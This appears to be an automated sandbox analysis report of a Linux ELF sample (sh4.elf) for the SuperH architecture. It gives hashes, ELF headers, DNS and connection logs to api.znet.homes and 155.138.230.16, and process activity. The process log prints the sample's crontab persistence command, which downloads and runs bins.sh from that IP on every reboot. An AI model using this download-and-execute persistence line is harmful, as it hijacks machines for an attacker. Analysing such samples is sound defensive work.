                SHA-256:54E1A0B8F58E28DE5532BE68EDC70123F7AB1F0A609D9A8E358FCFDCC68E53C7
                SHA-512:5C46DB9C5C63147D396826002FDB95B4CDB9E91A78B5D6AE88BF7E85DCB31183CCDF1F69170A92D79677EE61BD28FC26982EA0CBA4315B3A62127F38340B3F85
                Malicious:false
                Preview:5519 (/tmp/sh4.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/sh4.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):113
                Entropy (8bit):2.6315374472539035
                Encrypted:false
                SSDEEP:3:FU9oKWNxVBdSQhVvX:4KTWGf
                MD5:B56A70C8CADF7AD44945B5C260A6E397
                SHA1:F64267F0C6763A97AC6DD6B98206E62961A66A95
                SHA-256:54E1A0B8F58E28DE5532BE68EDC70123F7AB1F0A609D9A8E358FCFDCC68E53C7
                SHA-512:5C46DB9C5C63147D396826002FDB95B4CDB9E91A78B5D6AE88BF7E85DCB31183CCDF1F69170A92D79677EE61BD28FC26982EA0CBA4315B3A62127F38340B3F85
                Malicious:false
                Preview:5519 (/tmp/sh4.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/sh4.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):113
                Entropy (8bit):2.6315374472539035
                Encrypted:false
                SSDEEP:3:FU9oKWNxVBdSQhVvX:4KTWGf
                MD5:B56A70C8CADF7AD44945B5C260A6E397
                SHA1:F64267F0C6763A97AC6DD6B98206E62961A66A95
                SHA-256:54E1A0B8F58E28DE5532BE68EDC70123F7AB1F0A609D9A8E358FCFDCC68E53C7
                SHA-512:5C46DB9C5C63147D396826002FDB95B4CDB9E91A78B5D6AE88BF7E85DCB31183CCDF1F69170A92D79677EE61BD28FC26982EA0CBA4315B3A62127F38340B3F85
                Malicious:false
                Preview:5519 (/tmp/sh4.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/sh4.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):113
                Entropy (8bit):2.6315374472539035
                Encrypted:false
                SSDEEP:3:FU9oKWNxVBdSQhVvX:4KTWGf
                MD5:B56A70C8CADF7AD44945B5C260A6E397
                SHA1:F64267F0C6763A97AC6DD6B98206E62961A66A95
                SHA-256:54E1A0B8F58E28DE5532BE68EDC70123F7AB1F0A609D9A8E358FCFDCC68E53C7
                SHA-512:5C46DB9C5C63147D396826002FDB95B4CDB9E91A78B5D6AE88BF7E85DCB31183CCDF1F69170A92D79677EE61BD28FC26982EA0CBA4315B3A62127F38340B3F85
                Malicious:false
                Preview:5519 (/tmp/sh4.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/sh4.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):113
                Entropy (8bit):2.6315374472539035
                Encrypted:false
                SSDEEP:3:FU9oKWNxVBdSQhVvX:4KTWGf
                MD5:B56A70C8CADF7AD44945B5C260A6E397
                SHA1:F64267F0C6763A97AC6DD6B98206E62961A66A95
                SHA-256:54E1A0B8F58E28DE5532BE68EDC70123F7AB1F0A609D9A8E358FCFDCC68E53C7
                SHA-512:5C46DB9C5C63147D396826002FDB95B4CDB9E91A78B5D6AE88BF7E85DCB31183CCDF1F69170A92D79677EE61BD28FC26982EA0CBA4315B3A62127F38340B3F85
                Malicious:false
                Preview:5519 (/tmp/sh4.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/sh4.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):113
                Entropy (8bit):2.6315374472539035
                Encrypted:false
                SSDEEP:3:FU9oKWNxVBdSQhVvX:4KTWGf
                MD5:B56A70C8CADF7AD44945B5C260A6E397
                SHA1:F64267F0C6763A97AC6DD6B98206E62961A66A95
                SHA-256:54E1A0B8F58E28DE5532BE68EDC70123F7AB1F0A609D9A8E358FCFDCC68E53C7
                SHA-512:5C46DB9C5C63147D396826002FDB95B4CDB9E91A78B5D6AE88BF7E85DCB31183CCDF1F69170A92D79677EE61BD28FC26982EA0CBA4315B3A62127F38340B3F85
                Malicious:false
                Preview:5519 (/tmp/sh4.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                Process:/tmp/sh4.elf
                File Type:ASCII text
                Category:dropped
                Size (bytes):113
                Entropy (8bit):2.6315374472539035
                Encrypted:false
                SSDEEP:3:FU9oKWNxVBdSQhVvX:4KTWGf
                MD5:B56A70C8CADF7AD44945B5C260A6E397
                SHA1:F64267F0C6763A97AC6DD6B98206E62961A66A95
                SHA-256:54E1A0B8F58E28DE5532BE68EDC70123F7AB1F0A609D9A8E358FCFDCC68E53C7
                SHA-512:5C46DB9C5C63147D396826002FDB95B4CDB9E91A78B5D6AE88BF7E85DCB31183CCDF1F69170A92D79677EE61BD28FC26982EA0CBA4315B3A62127F38340B3F85
                Malicious:false
                Preview:5519 (/tmp/sh4.elf) 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 2147483056 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0.
                File type:ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped
                Entropy (8bit):6.905880378076135
                TrID:
                • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                File name:sh4.elf
                File size:74'432 bytes
                MD5:d6b9804cee75cc6115bb50814ba03002
                SHA1:344495d026b0414343d9f7ba4ef405e8e527d1a0
                SHA256:224d2f79cf57b625edda8b9358d774c49d507b19a19af8682e2f1dfba623cf92
                SHA512:9acf48064b8270f4b8a898478335601b553714fe35f162545c6d2e41621042de146d0c5fa96f97360beec089eddf25405860c15225e0ad100a3b2e0ac6baf098
                SSDEEP:1536:RDo3fafQAN5mY8SkGzPHdTHa7kmFAQiROS:RDmaQ05N8nc9D+kmF1S
                TLSH:10735B63D5299E95C0426DF06AF6CEB80F23BC924A330E71A5A5DFE51183DD8F1807B6
                File Content Preview:.ELF..............*.......@.4.... ......4. ...(...............@...@.(...(...............(...(.B.(.B......h..........Q.td............................././"O.n........#.*@........#.*@.....o&O.n...l..............................././.../.a"O.!...n...a.b("...q.

                ELF header

                Class:ELF32
                Data:2's complement, little endian
                Version:1 (current)
                Machine:<unknown>
                Version Number:0x1
                Type:EXEC (Executable file)
                OS/ABI:UNIX - System V
                ABI Version:0
                Entry Point Address:0x4001a0
                Flags:0x9
                ELF Header Size:52
                Program Header Offset:52
                Program Header Size:32
                Number of Program Headers:3
                Section Header Offset:73912
                Section Header Size:40
                Number of Section Headers:13
                Header String Table Index:12
                NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                NULL0x00x00x00x00x0000
                .initPROGBITS0x4000940x940x300x00x6AX004
                .textPROGBITS0x4000e00xe00xf7a00x00x6AX0032
                .finiPROGBITS0x40f8800xf8800x240x00x6AX004
                .rodataPROGBITS0x40f8a40xf8a40x17840x00x2A004
                .eh_framePROGBITS0x4210280x110280x40x00x3WA004
                .ctorsPROGBITS0x42102c0x1102c0x80x00x3WA004
                .dtorsPROGBITS0x4210340x110340x80x00x3WA004
                .jcrPROGBITS0x42103c0x1103c0x40x00x3WA004
                .dataPROGBITS0x4210400x110400x2a00x00x3WA004
                .bssNOBITS0x4212e00x112e00x66380x00x3WA004
                .commentPROGBITS0x00x112e00xd800x00x0001
                .shstrtabSTRTAB0x00x120600x560x00x0001
                TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                LOAD0x00x4000000x4000000x110280x110286.93180x5R E0x10000.init .text .fini .rodata
                LOAD0x110280x4210280x4210280x2b80x68f03.91950x6RW 0x10000.eh_frame .ctors .dtors .jcr .data .bss
                GNU_STACK0x00x00x00x00x00.00000x7RWE0x4

                Download Network PCAP: filteredfull

                • Total Packets: 22
                • 1290 undefined
                • 80 (HTTP)
                • 53 (DNS)
                TimestampSource PortDest PortSource IPDest IP
                Mar 23, 2025 23:03:59.808971882 CET467021290192.168.2.15155.138.230.16
                Mar 23, 2025 23:04:00.252626896 CET4891480192.168.2.15155.138.230.16
                Mar 23, 2025 23:04:00.811774015 CET467021290192.168.2.15155.138.230.16
                Mar 23, 2025 23:04:01.259798050 CET4891480192.168.2.15155.138.230.16
                Mar 23, 2025 23:04:02.827656031 CET467021290192.168.2.15155.138.230.16
                Mar 23, 2025 23:04:03.275650024 CET4891480192.168.2.15155.138.230.16
                Mar 23, 2025 23:04:06.891525984 CET467021290192.168.2.15155.138.230.16
                Mar 23, 2025 23:04:07.403635025 CET4891480192.168.2.15155.138.230.16
                Mar 23, 2025 23:04:15.083231926 CET467021290192.168.2.15155.138.230.16
                Mar 23, 2025 23:04:15.595169067 CET4891480192.168.2.15155.138.230.16
                Mar 23, 2025 23:04:31.210577011 CET467021290192.168.2.15155.138.230.16
                Mar 23, 2025 23:04:31.722560883 CET4891480192.168.2.15155.138.230.16
                Mar 23, 2025 23:05:04.489356995 CET467021290192.168.2.15155.138.230.16
                Mar 23, 2025 23:05:04.489381075 CET4891480192.168.2.15155.138.230.16
                Mar 23, 2025 23:05:15.004138947 CET467061290192.168.2.15155.138.230.16
                Mar 23, 2025 23:05:16.009018898 CET467061290192.168.2.15155.138.230.16
                Mar 23, 2025 23:05:18.025007963 CET467061290192.168.2.15155.138.230.16
                Mar 23, 2025 23:05:22.152743101 CET467061290192.168.2.15155.138.230.16
                Mar 23, 2025 23:05:30.344393969 CET467061290192.168.2.15155.138.230.16
                Mar 23, 2025 23:05:46.471847057 CET467061290192.168.2.15155.138.230.16
                TimestampSource PortDest PortSource IPDest IP
                Mar 23, 2025 23:03:59.686100960 CET4621853192.168.2.151.1.1.1
                Mar 23, 2025 23:03:59.806999922 CET53462181.1.1.1192.168.2.15
                Mar 23, 2025 23:05:14.829925060 CET4701953192.168.2.151.1.1.1
                Mar 23, 2025 23:05:15.002628088 CET53470191.1.1.1192.168.2.15
                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                Mar 23, 2025 23:03:59.686100960 CET192.168.2.151.1.1.10x1637Standard query (0)api.znet.homesA (IP address)IN (0x0001)false
                Mar 23, 2025 23:05:14.829925060 CET192.168.2.151.1.1.10xdfe3Standard query (0)api.znet.homesA (IP address)IN (0x0001)false
                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                Mar 23, 2025 23:03:59.806999922 CET1.1.1.1192.168.2.150x1637No error (0)api.znet.homes155.138.230.16A (IP address)IN (0x0001)false
                Mar 23, 2025 23:05:15.002628088 CET1.1.1.1192.168.2.150xdfe3No error (0)api.znet.homes155.138.230.16A (IP address)IN (0x0001)false

                System Behavior

                Start time (UTC):22:03:53
                Start date (UTC):23/03/2025
                Path:/tmp/sh4.elf
                Arguments:/tmp/sh4.elf
                File size:4139976 bytes
                MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                Start time (UTC):22:03:53
                Start date (UTC):23/03/2025
                Path:/tmp/sh4.elf
                Arguments:-
                File size:4139976 bytes
                MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                Start time (UTC):22:03:53
                Start date (UTC):23/03/2025
                Path:/tmp/sh4.elf
                Arguments:-
                File size:4139976 bytes
                MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                Start time (UTC):22:03:58
                Start date (UTC):23/03/2025
                Path:/tmp/sh4.elf
                Arguments:-
                File size:4139976 bytes
                MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                Start time (UTC):22:03:58
                Start date (UTC):23/03/2025
                Path:/tmp/sh4.elf
                Arguments:-
                File size:4139976 bytes
                MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                Start time (UTC):22:03:58
                Start date (UTC):23/03/2025
                Path:/tmp/sh4.elf
                Arguments:-
                File size:4139976 bytes
                MD5 hash:8943e5f8f8c280467b4472c15ae93ba9

                Start time (UTC):22:03:58
                Start date (UTC):23/03/2025
                Path:/bin/sh
                Arguments:sh -c "(crontab -l ; echo \"@reboot /bin/bash -c \"/bin/wget http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh; /bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh; chmod +x bins.sh; sh bins.sh\"\") | crontab -"
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):22:03:58
                Start date (UTC):23/03/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):22:03:58
                Start date (UTC):23/03/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):22:03:58
                Start date (UTC):23/03/2025
                Path:/usr/bin/crontab
                Arguments:crontab -l
                File size:43720 bytes
                MD5 hash:66e521d421ac9b407699061bf21806f5

                Start time (UTC):22:03:58
                Start date (UTC):23/03/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):22:03:58
                Start date (UTC):23/03/2025
                Path:/usr/bin/chmod
                Arguments:chmod +x bins.sh
                File size:63864 bytes
                MD5 hash:739483b900c045ae1374d6f53a86a279

                Start time (UTC):22:03:59
                Start date (UTC):23/03/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):22:03:59
                Start date (UTC):23/03/2025
                Path:/usr/bin/sh
                Arguments:sh bins.sh
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):22:03:59
                Start date (UTC):23/03/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):22:03:59
                Start date (UTC):23/03/2025
                Path:/bin/curl
                Arguments:/bin/curl -k -L --output bins.sh http://155.138.230.16/bins/bins.sh
                File size:239848 bytes
                MD5 hash:add6bc2195e82c55985ccf49fd4048e6

                Start time (UTC):22:03:58
                Start date (UTC):23/03/2025
                Path:/bin/sh
                Arguments:-
                File size:129816 bytes
                MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                Start time (UTC):22:03:58
                Start date (UTC):23/03/2025
                Path:/usr/bin/crontab
                Arguments:crontab -
                File size:43720 bytes
                MD5 hash:66e521d421ac9b407699061bf21806f5